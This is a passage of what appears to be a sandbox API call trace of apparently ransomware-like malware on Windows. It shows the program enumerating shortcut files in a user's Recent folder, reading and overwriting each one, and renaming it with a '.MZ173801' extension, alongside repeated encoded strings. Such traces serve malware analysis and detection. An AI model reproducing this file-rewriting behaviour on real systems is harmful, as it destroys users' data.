lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0109.712] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0109.712] GetCurrentThreadId () returned 0x1358 [0109.712] GetCurrentThreadId () returned 0x1358 [0109.712] GetCurrentThreadId () returned 0x1358 [0109.712] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\NVV_UxLtcOyTWBX.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\nvv_uxltcoytwbx.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0109.712] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0109.712] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0109.712] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x41a [0109.713] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0109.713] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x41a, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x41a, lpOverlapped=0x0) returned 1 [0109.713] CloseHandle (hObject=0x3f4) returned 1 [0109.713] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\NVV_UxLtcOyTWBX.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\nvv_uxltcoytwbx.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0109.714] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x41a, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x41a, lpOverlapped=0x0) returned 1 [0109.715] CloseHandle (hObject=0x3f4) returned 1 [0109.716] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\NVV_UxLtcOyTWBX.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\nvv_uxltcoytwbx.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\NVV_UxLtcOyTWBX.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\nvv_uxltcoytwbx.lnk.mz173801")) returned 1 [0109.716] GetCurrentThreadId () returned 0x1358 [0109.716] GetCurrentThreadId () returned 0x1358 [0109.716] GetCurrentThreadId () returned 0x1358 [0109.716] GetCurrentThreadId () returned 0x1358 [0109.716] GetCurrentThreadId () returned 0x1358 [0109.716] GetCurrentThreadId () returned 0x1358 [0109.716] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeadb10bc, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xeadb10bc, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xeadb10bc, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x539, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="nZr6PHEvCUKrD5BUDBLc.lnk", cAlternateFileName="NZR6PH~1.LNK")) returned 1 [0109.716] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0109.716] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0109.717] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\nZr6PHEvCUKrD5BUDBLc.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\nzr6phevcukrd5budblc.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeadb10bc, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xeadb10bc, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xeadb10bc, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x539)) returned 1 [0109.717] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0109.717] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0109.717] GetCurrentThreadId () returned 0x1358 [0109.717] GetCurrentThreadId () returned 0x1358 [0109.717] GetCurrentThreadId () returned 0x1358 [0109.718] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0109.718] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0109.718] GetCurrentThreadId () returned 0x1358 [0109.718] GetCurrentThreadId () returned 0x1358 [0109.718] GetCurrentThreadId () returned 0x1358 [0109.718] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\nZr6PHEvCUKrD5BUDBLc.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\nzr6phevcukrd5budblc.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0109.718] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0109.718] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0109.718] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x539 [0109.718] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0109.718] ReadFile (in: hFile=0x3f4, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x539, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x539, lpOverlapped=0x0) returned 1 [0109.719] CloseHandle (hObject=0x3f4) returned 1 [0109.719] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\nZr6PHEvCUKrD5BUDBLc.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\nzr6phevcukrd5budblc.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0110.097] WriteFile (in: hFile=0x3f4, lpBuffer=0x2433b60*, nNumberOfBytesToWrite=0x539, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2433b60*, lpNumberOfBytesWritten=0x19f9bc*=0x539, lpOverlapped=0x0) returned 1 [0110.099] CloseHandle (hObject=0x3f4) returned 1 [0110.101] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\nZr6PHEvCUKrD5BUDBLc.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\nzr6phevcukrd5budblc.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\nZr6PHEvCUKrD5BUDBLc.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\nzr6phevcukrd5budblc.lnk.mz173801")) returned 1 [0110.103] GetCurrentThreadId () returned 0x1358 [0110.103] GetCurrentThreadId () returned 0x1358 [0110.103] GetCurrentThreadId () returned 0x1358 [0110.103] GetCurrentThreadId () returned 0x1358 [0110.103] GetCurrentThreadId () returned 0x1358 [0110.103] GetCurrentThreadId () returned 0x1358 [0110.103] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d482b73, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x7d482b73, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x7d482b73, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x62a, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="o0b7l4H.lnk", cAlternateFileName="")) returned 1 [0110.103] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0110.103] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0110.103] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\o0b7l4H.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\o0b7l4h.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d482b73, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x7d482b73, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x7d482b73, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x62a)) returned 1 [0110.104] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0110.104] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 